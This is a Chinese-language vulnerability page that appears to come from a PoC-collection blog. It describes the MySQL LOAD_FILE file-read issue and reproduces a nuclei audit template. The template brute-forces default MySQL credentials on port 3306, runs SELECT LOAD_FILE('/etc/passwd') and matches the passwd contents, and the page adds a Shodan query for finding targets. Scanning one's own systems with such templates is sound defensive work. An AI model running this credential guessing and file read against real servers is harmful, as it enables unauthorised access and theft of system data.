MySQL LOAD_FILE 漏洞

漏洞信息

漏洞名称: MySQL LOAD_FILE 漏洞

漏洞类型: 文件读取

漏洞等级: 高危

漏洞描述: MySQL是一个广泛使用的开源关系型数据库管理系统,支持多用户、多线程,常用于Web应用程序的后端数据存储。LOAD_FILE函数是MySQL中的一个内置函数,设计用于读取服务器上的文件内容并返回为字符串。然而,如果使用不当,该函数可能导致安全风险。此漏洞属于文件读取类型,其技术根源在于未对LOAD_FILE函数的使用进行适当的限制或输入验证,使得攻击者可以通过构造特定的SQL查询,读取服务器上的敏感文件,如/etc/passwd。这种漏洞的存在可能导致敏感信息泄露,进而可能被用于进一步的攻击。攻击者需要具备有效的数据库凭据才能利用此漏洞,但通过暴力破解或利用弱口令,攻击者可能绕过这一限制。此漏洞的利用可以自动化进行,增加了其潜在的危险性。

产品厂商: Oracle

产品名称: MySQL

搜索语法: port:3306

来源: https://github.com/projectdiscovery/nuclei-templates/blob/804d1df949d5fbbfdee11564a2df65b6836a8d60/javascript%2Faudit%2Fmysql%2Fmysql-load-file.yaml

类型: projectdiscovery/nuclei-templates:github issues

POC详情

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63

id: mysql-load-file
info:
  name: MySQL LOAD_FILE - Enable
  author: pussycat0x
  severity: high
  description: |
    The LOAD_FILE function in MySQL is potentially dangerous if not used carefully, as it can pose security risks. The function is designed to read the contents of a file on the server and return the file contents as a string. However, it can be exploited if not properly restricted or sanitized, leading to security vulnerabilities.
  reference:
    - https://nmap.org/nsedoc/scripts/mysql-databases.html
  metadata:
    verified: true
    max-request: 16
    shodan-query: "port:3306"
  tags: js,mysql,network,audit

javascript:
  - pre-condition: |
      isPortOpen(Host,Port);
    code: |
      let m = require('nuclei/mysql');
      let c = m.MySQLClient();
      let response = c.ExecuteQuery(Host,Port,User,Pass,Query);
      Export(response);

    args:
      Host: "{{Host}}"
      Port: "3306"
      Query: SELECT LOAD_FILE('/etc/passwd')
      User: "{{usernames}}"
      Pass: "{{passwords}}"

    payloads:
      usernames:
        - root
        - admin
        - mysql
        - test
      passwords:
        - root
        - admin
        - mysql
        - test
    attack: clusterbomb

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - success == true

      - type: word
        words:
          - "root:x:"

    extractors:
      - type: json
        part: response
        json:
          - .Rows[]
# digest: 4a0a004730450221009ad416364c3679ae98d7f27001407c284157e5ee85cfcea19ed1d53e4119128d02205a3741b7625ca7a9c74d10f76c99007e382188b80f5d6c7cadcf28d583b727e6:922c64590222798bb761d5b6d8e72950

Github Poc
#projectdiscovery/nuclei-templates:github issues #文件读取
MySQL LOAD_FILE 漏洞
http://example.com/2025/07/27/github_2304026959/
作者
lianccc
发布于
2025年7月27日
许可协议